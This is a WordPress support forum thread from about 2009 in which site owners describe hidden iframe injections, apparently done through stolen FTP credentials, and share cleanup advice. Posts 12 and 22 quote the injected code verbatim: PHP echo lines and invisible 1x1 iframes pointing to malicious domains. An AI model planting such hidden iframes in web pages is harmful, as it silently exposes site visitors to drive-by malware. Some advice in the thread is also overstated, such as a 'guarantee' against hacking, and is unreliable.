WordPress.org

Ready to get started?Download WordPress

Forums

WordPress hacked (31 posts)

  1. joeyconnick
    Member
    Posted 5 years ago #

    Just had a WordPress site of mine that was hacked earlier this morning, had an iframe directing to lotultimatebet.cn inserted in the main *.php files throughout the site.

    Has anyone else experienced this? And does anyone know how to protect against whatever attack was used?

  2. tomontoast
    Member
    Posted 5 years ago #

    To guarantee that you won't get hacked always use the latest version of wordpress, only use plugins, scripts and themes which you trust and use a secure password for your wordpress admin, your database and your ftp. Just out of interest, what is the url for your site?

  3. web1@naturopathy-uk.com
    Member
    Posted 5 years ago #

    I had the same thing. I am using wp 2.5.1 on the site. When upgrading to 2.7.1 ran into problems on another site so didn't yet upgrade yet.

    In fact the one with 2.7.1 has been hacked too. I can't even get back into the back-end at the moment.

  4. tomontoast
    Member
    Posted 5 years ago #

    Could you post a link to that hacked site.

  5. bsains
    Member
    Posted 5 years ago #

    Be aware joeyconnick that you could possibly have a rootkit installed on your system.

    I've recently had issues with sites that I develop, albeit .Net sites, also hacked and injected with same/similar iframe code. An example below...

    betbigwager.cn/in.cgi?income61
    lotultimatebet.cn/in.cgi?income60

    I believe that my system was compromised with a rootkit, and access details to the sites I manage were retrieved for the express interest of further propogating the rootkit. I say this becuase AVG picked up the presence of rootkit activity after I viewed an infected page.

    In regards to how I was compromised... I was not surfing inappropriate material, nor executing unkown files... I think it's probably a firefox exploit... more than likely on a add-on. Good Luck.

  6. joeyconnick
    Member
    Posted 5 years ago #

    Thanks for the info, bsains. I doubt it's a rootkit on my system but it might be one on the system of my friend whose blog it is. She's the one who usually interacts with it.

    We were also advised it might have been a brute-force attack against her ftp password.

    Yeah, the injected iframe stuff for us was the lotultimatebet site.

    I'll see if her anti-virus software has rootkit detection.

  7. UseShots
    Member
    Posted 5 years ago #

    Hi,

    This is not a WordPress exploit. Most likely FTP password is compromised.

    I've just covered this particular exploit in my blog.
    http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/

    1. Scan local computers for viruses and spyware
    2. Change FTP passwords
    3. Upload clean content from a backup
  8. JuneM0
    Member
    Posted 5 years ago #

    euh,don't know. how do you know when your wp is hacked?

  9. Samuel B
    moderator
    Posted 5 years ago #

  10. TransPersonal
    Member
    Posted 5 years ago #

    For the future:

    1. Change your database prefix:

    http://semperfiwebdesign.com/documentation/wp-security-scan/change-wordpress-database-table-name-prefix/

    2. Change username from admin to somehthing else

    3. Install the following plugins:

    -apache password protect:

    http://wordpress.org/extend/plugins/askapache-password-protect/

    -wordpress security scan:

    http://wordpress.org/extend/plugins/wp-security-scan/

    -wordpress firewall:

    http://www.seoegghead.com/software/wordpress-firewall.seo

    4. Disable ping response (ICMP) on your server (if you have the rights), this will prevent some DOS attacks:

    http://techgurulive.com/2008/11/06/how-to-disable-ping-response-linux/

  11. cnmadmin
    Member
    Posted 5 years ago #

    Thanks all for your answers. I've changed passwords, uploaded clean content, etc and am going through other steps to avoid wasting a day of my life again.

    Tomontoast to answer your q:
    1. http://www.naturopathy-uk.com
    2. http://www.naturopathy.ie
    3. http://www.cnmstudent.com

  12. Gauhar Kachchhi
    Member
    Posted 5 years ago #

    Here is what appears in my index.php file

    <?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./blog/wp-blog-
    header.php');
    
    echo "<iframe src=\"http://xtrarobotz.com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    
    echo "<iframe src=\"http://nipkelo.net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    
    echo "<iframe src=\"http://internetcountercheck.com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    ?>
    <iframe src="http://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe>
    
    <iframe src="http://litecartop.cn/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>

    What should I do now... All my blogs have been similarly hacked, even non-wordpress domains

  13. UseShots
    Member
    Posted 5 years ago #

    The income .cn iframes are not even PHP-related. They are added at the bottom of files like index.html, index.php, etc.

    The xtrarobotz/nipkelo/internetcountercheck hack is more sophisticated - it injects PHP-code. I didn't investigate it, but since they usually appear on the same sites as the income .cn iframes, I assume the same compromised passwords are used.

  14. boatwizard
    Member
    Posted 5 years ago #

    We got hacked when we installed this WordPress plug-in: Make Tabbloid. We believe it takes advantage of the PDF creation tool and therefore allowed the hacker to gain acccess.

  15. Anonymous
    Unregistered
    Posted 5 years ago #

    does any one have any plugin which automatically sends alert to the owners email address if some one try wrong password on our blog or have other kind of instant notification. That would be also helpful what do you guys think?

  16. TheMarque
    Member
    Posted 5 years ago #

    My website was also hacked this week and I've been spending the last two days fixing it. I think I finally got is resolved. They injected links into alot of the theme files and then iframe injections into some posts. It was really weird. I removed the admin user, changed the passwords, and added alot of plugins that were suggested in this blog: http://www.aboutonlinetips.com/wordpress-security-plugins/

    @Saaqi If you wanted a plugin to help with securing your log in, Stealth Login, Login LockDown, and Chap Secure Login are your best options.

  17. cdmarine
    Member
    Posted 5 years ago #

    I would like some clarification on changing the database prefix. These are the instructions listed at http://semperfiwebdesign.com/documentation/wp-security-scan/change-wordpress-database-table-name-prefix/ :

    1. backup your wordpress database to a sql file (you can use phpmyadmin)
    2. open that *.sql file (make another copy first) using text editor, then find and replace all “wp_” prefix to “something_”.
    3. now, drop all tables of your wordpress databases (don’t drop the database)
    4. import the *.sql file which has been edited before into your wordpress databases.
    5. and lastly, edit your wp-config.php file and change the $table_prefix = ‘wp_’; to $table_prefix = ’something_’;
    6. you may find that your plugins are deactivated automatically when this happens, so you’ll want to activate them again if that’s the case… I’d recommend deactivating them prior to doing this anyway as a precaution.

    Can someone please explain to me what "drop all tables" means? Does that mean "delete"?

    I'm desperate here. I've been hacked repeatedly, and I'm at the end of my rope. I installed the WP Security Scan plugin and it tells me the only things wrong with my installation are that my prefixes are still set to "wp_" and that "file .htaccess does not exist in wp-admin/".

    Can someone tell me what the latter means, and what I should do about it. And please feel free to speak to me like I'm a 5-year old, because I really do not know what I'm doing with this stuff.

    For your reference, here's what's been happening, and here's what I'm using:

    Problem:
    Repeatedly hacked by a group called "Red Virus." They appear to only be messing with the theme header.php file. They don't appear to be redirecting, or causing any other nefarious stuff to happen. It appears to be just changing the look of the page for attention and giggles. I say "appears" because I don't know jack about any of this, and God knows how they got in in the first place, so who knows what else they might have done elsewhere in my files.

    WordPress Version
    WP 2.7.1 (up to date)

    Theme:
    Atahualpa 3.2 (up to date)

    Plugins:
    Offical StatCounter Plugin 1.0 (up to date)
    Sociable 3.1.1 (up to date)
    WP-Spamfree 2.0.0.6 (up to date)
    WP Security Scan 2.4 (up to date)

    Inactive Plugins:
    Addmarx 1.1.7
    Akismet 2.2.3
    Hello Dolly 1.5

  18. cdmarine
    Member
    Posted 5 years ago #

    Oh, and just for reference again...

    Each time it has happened, I have checked for the creation of new users, and that has not happened. However they're continuing to get in, it's not by creating a new user (they do helpfully change my password for me, though!).

    And my password this last time was just a bunch of random characters, so it's unlikely they're just cracking passwords.

  19. Inspired2Write
    Member
    Posted 5 years ago #

    Just discovered my site has been hacked today too. :( The problem first showed when a BadBehavior error message came up, indicating the headers were already sent, so I looked at my page source and saw the header iframe hack, which is showing the source from: worldnamebuy.cn.

    Although I can access my website's home page and other pages, I cannot access my WordPress admin panel when I attempt to login. The last time I accessed my site without any problem was late last week. I thought I would report here one of the last things I did last week from my admin panel, prior to this problem. I deleted 4 spam comments, which Akismet caught, but had gotten past BadBehavior.

    Prior to that I had updated my BadBehavior software from within the WordPress admin panel, but unfortunately after doing so I read over on BadBehaviors site that depending on what version of WordPress and BadBehavior you had, that you should instead do the upgrade from within your ftp, not from with the WordPress panel.

    I hope my information in regards to what I was doing last on my site before the hack may help someone avoid the same pain, assuming there may be any connection. I also use Firefox with numerous extensions, and will need to check those out.

  20. Inspired2Write
    Member
    Posted 5 years ago #

    UPDATE: Found additional iframe hacks and thought I would report here with my findings so far in order to assist others. Two of the files I found that were hacked (WP 2.7.1) were these:

    wp-index.php

    wp-includes/default-filters.php
    The hacker's iframe url was the very last line of code in the default filters file, so it could easily be overlooked. Replacing the contaminated default filters php file with a clean one enabled me to get back into my WP Admin panel, whereas I could not get in before. Much to do yet as I have not yet found the vulnerability that allowed the site to get hacked in the first place, but I'm suspecting a plug-in that I installed late last week. Hope this info helps someone!

  21. tthorp@brown.edu
    Member
    Posted 5 years ago #

    the iframe hack that I encountered is similar to those hacks posted here, but I have a few more details that I would like to share. The attack scanned all files in the web server (many of which were outside of wordpress and included php sites and also static html sites). The attacking script added an iframe to any files which had index, homepage or default in the filename, so in wordpress, it injected the iframe into index.php, wp-admin/index-extra.php, wp-admin/index.php, wp-content/index.php, the index file for each theme and also in wp-includes/default-filters.php.
    I'm not a web security expert, but I did notice that the modified sites were affected in alphabetical order, so I think the script was working through my ftp account. For this reason, I updated my password and switched my ftp service to only work over sftp, which encrypts my password.

  22. shankybaba
    Member
    Posted 5 years ago #

    Even I'm getting the same error.

    I checked my index.php file, found this code added into the file. There many other php file which has been infected with the below code.

    // Silence is golden.
    <iframe src="http://2mj.pl:8080/ts/in.cgi?pepsi74" width=125 height=125 style="visibility: hidden"></iframe>

  23. gariben
    Member
    Posted 5 years ago #

    This is a FTP password compromise.

    Not related to WordPress.

    Make sure to upgrade your Adobe Reader to the lastest version. You probably have Adobe Reader 8.0 and using FileZilla.

  24. timeisenhauer
    Member
    Posted 5 years ago #

    I am getting the same issue, on not 1 but about 10 of my sites. Some are wordpress and some are .NET sites.

    This has been going on for 4 weeks. I am at my wits end.

    The wordpress sites continue to become infected, even after I clean them / update them with new clean files. The .NET sites also randomly become infected after they are cleaned.

    - I am the only person with access to the websites

    - I have reloaded both my laptop and my PC and cleaned them (in case there was some trojan or malware on my pc or laptop).

    - I have changed all FTP user/pass a number of times

    - I have removed (deleted) entire websites and restored them with clean files

    They continue to get this IFRAME injected into them.

    This is definitely related to FTP. I have mosso hosting and there are a number of 'root' directories accessible from one FTP login. All websites seem to be infected, one right after the other (any files with 'default' or 'index' in the file name).

    I do have a few of the websites at a point where they are not getting infected. It seems that if you can remove all those nasty IFRAMES, then you should be in the clear...although I cant be sure.

    I feel everyone's pain...this is very frustrating. Please ping me if anyone finds a surefire fix and I'll do the same. Many thanks.

  25. stuffiwrote
    Member
    Posted 5 years ago #

    Thank goodness it's not just me who is experiencing this issue with the iframe hack.

    Yesterday my blog was fine, today my homepage had a PHP parse error. I investigated and found the same thing, iframe code added to the bottom of heaps of pages.

    I thought I got rid of all the affected pages but every change I made threw up a new error.

    POSSIBLE FIRST?: Not sure if anyone else has experienced this (i'll be honest and admit I have not read every post above this!), but it could be a possible first or new approach for this hack.

    Not only did I get the iframe code inserted on the pages (mostly index.php but also heaps of others, even in the GD Star Rating plugin I use) but it also truncated lots of legit code on the page (possibly due to where it was inserted?).

    Anyway, I got sick of chasing down the code as it seems it's been inserted everywhere. I took extreme action and deleted my WP installation and SQL database (after backing up what I needed; blog entries, jpg images etc) and am presently reinstalling and configuring my blog all over again.

    Thankfully I am blessed with the fact my blog is relatively new. I can quickly repost and have the tweaked php code (where applicable) I made for customising the theme I use (Modicus remix) so hopefully I should be up and running again soon.

    Further I have now changed all usernames and passwords using an online password generator so now all my usernames and logins etc are insanely long and complex. Feck it, it's worth it so I hopefully do not have to go through this again. I feel for you all!

    FYI: I also use Filezilla (latest version) but do not use Adobe Reader, rather Foxit instead (much better I think).

    FYI2: I got a virus on my system the day before I discovered this problem. It was that bad I had to format my computer and reinstall WindowsXP. I am not sure if the virus I picked up could have contributed to the hack(?) as my blog was fine last night when I checked my Wassup stats.

  26. gariben
    Member
    Posted 5 years ago #

    @stuffiwrote

    I think it doesn't matter if you use Adobe Reader or not.

    I want to know if the Adobe Reader program exist in your computer. If so, what version? If not, my theory on Adobe 8 and Fizezilla hack is wrong.

  27. edrabbit
    Member
    Posted 5 years ago #

    I got hit too. Several sites, similar symptoms. Oddly enough not every site on my server was affected. Looks like trojan hack as I had a bunch of AVG warnings pop up when I went to read the news about thepiratebay getting sold. Looks like one of them got through and stole the passwords I had stored in Filezilla. :( I have Adobe 7 reader installed, but I don't think that matters. Another person I talked to uses cuteftp and he got hacked too. I would wager that it doesn't matter which ftp software you're using. If it's popular, they're probably targeting it.

    I'm probably just going to format and reinstall windows on the desktop machine that was compromised and then restore backups on the web servers, change passwords, etc.

    If you want to chat about things, share info, etc. Join us on Freenode (irc.freenode.com) in channel #microsotf.cn If you don't have an irc client, you can use the webchat: http://java.freenode.net//index.php?channel=microsotf.cn

  28. homecoder
    Member
    Posted 5 years ago #

    A good friend of mine was hit too. He found it odd that all of HIS sites were being affected, but nobody else and he blamed wordpress himself, he did a backup and removed it.

    After figuring out that there was no scripts on his server (server side) php OR cgi or whatever, he finally realized that it was being done via FTP.

    I was able to take a look at the code being executed, as I was under Linux (with JavaScript shut off), without any adobe PDF, and sure enough, the executed code was an iframe that lead to another page, with an iframe, which used a script to check if PDF was available, and load a PDF file, again, hidden with CSS.

    From what I've read around, this is a vulnerability allowing for remote code execution, including but not limited to Key Loggers.

    The issue went away when I had my friend download a linux live CD, Slax, http://www.slax.org and he was able to use the available Avast! Antivirus and it cleaned quite a few viruses / trojans, he then changed ALL ftp passwords, and his web hosts control panel password, all within Linux.

    Another idea would be if you have a web host with a control panel, see if the attackers had created any additional FTP accounts (which are in many cases available).

    As a note, however, Linux is not impervious to viruses but most virus programmers will attack the masses (Windows).

    The strangest part however of the whole thing - is that the iframes that were injected into the wordpress files, didn't come complete, missing key elements, thus they actually BROKE wordpress.

    I am unsure how this happened, but this behavior actually HELPED me to figure out what the issue is.

    Best of luck to everyone who has this issue, I will shortly be putting together a blog post to help those who are having this issue work through it.

  29. sitesecure
    Member
    Posted 5 years ago #

    If you are having trouble removing the scripts from your pages and/or getting your site back into Google's good graces, you might want to check out http://www.iframehack.com . Their blog provides quite a bit of information on the hack, including a list of the domains that these hidden iframes are directing traffic to, and provide a service that removes the malicious content from all of the pages on your site that were affected by the virus/trojan and assists with getting the site reincluded in Google results and having the "attack site" label removed.

    Hope this helps someone!

  30. deepjava
    Member
    Posted 4 years ago #

    I think it is not wordpress code but some trojan on windows machine which keeps a watch on your network layer and scans all communication.

    I could figure out this when i asked for ftp log from hosting service provider. My login details were available from all over the world and even while i was sleeping :(

    What to do when your website is infected with such iframe malware
    ======================================================
    1. Immediately change your ftp passwords.
    2. Clean up your local machine from all the viruses, trojans, malware, rootkits etc.
    3. Install good antivirus with updates and firewall with limited ports open.
    4. do netstat to keep a watch on invalid trojan operation running in background.
    5. Hope you have backup of your site. If yes then login to your website and delete all the content.
    6. if you do not have backup download all the files from your website and scan for iframes. Remove unwanted iframes or malware tags.
    7. upload the correct copy of files to the server.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.